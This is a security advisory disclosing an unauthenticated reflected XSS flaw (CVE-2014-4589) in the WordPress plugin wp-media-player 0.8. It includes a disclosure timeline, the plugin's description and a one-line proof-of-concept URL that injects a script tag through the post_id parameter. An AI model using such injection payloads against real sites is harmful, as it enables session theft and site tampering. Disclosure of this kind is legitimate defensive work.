wp-plugin : wp-media-player – A3-Cross-Site Scripting (XSS)

 

Plugin Details

 

Plugin Name : wp-media-player

 

Effected Version : 0.8 (and most probably lower version's if any)

 
Vulnerability : A3-Cross-Site Scripting (XSS)
 
Identified by : Prajal Kulkarni

 

 

Technical Details

 

Minimum Level of Access Required : Unauthenticated

 

PoC - (Proof of Concept) :

 

http://127.0.0.1/wordpress/wp-content/wpmediaplayer/uploader.php?tab=choose&post_id=tester%22%3C/script%3E%3Cscript%3Ealert%281%29%3C/script%3E

 

Disclosure Timeline

 

Vendor Contacted : 2014-01-15

 
Plugin Status : Closed on 2014-01-11
 
Public Disclosure : April 25, 2014
 
CVE Number : CVE-2014-4589

 
Plugin Description :
 
This plugin allows addition of Silverlight-based media players to WordPress blog posts and pages. The players can be used to play Windows Media Video (WMV) encoded video content.

The plugin has the following features:

* 6 player styles
* Watermark image
* Tracking and reporting on how many times the videos have been watched
* Default player configuration settings, such as size, thumbnail, auto load and auto play.
* Per-instance player configuration settings that can be used to customize each individual player within or across blog posts.
* Unlimited number of players within the same blog post or page.
* UI for uploading of video files and for inserting media players into blog posts and pages

Follow the instructions at [WP Media Player - Video Encoding](http://ruslany.net/wp-media-player/video-encoding/) to encode the video content for the player.

The version 0.8 contains several bug fixes and a new feature for adding watermark image in the player. Refer to the [changelog](http://ruslany.net/wp-media-player/changelog/) for more details.

For more information, demos and usage instructions refer to [the plugin home page](http://ruslany.net/wp-media-player/).

Leave a Reply

Your email address will not be published. Required fields are marked *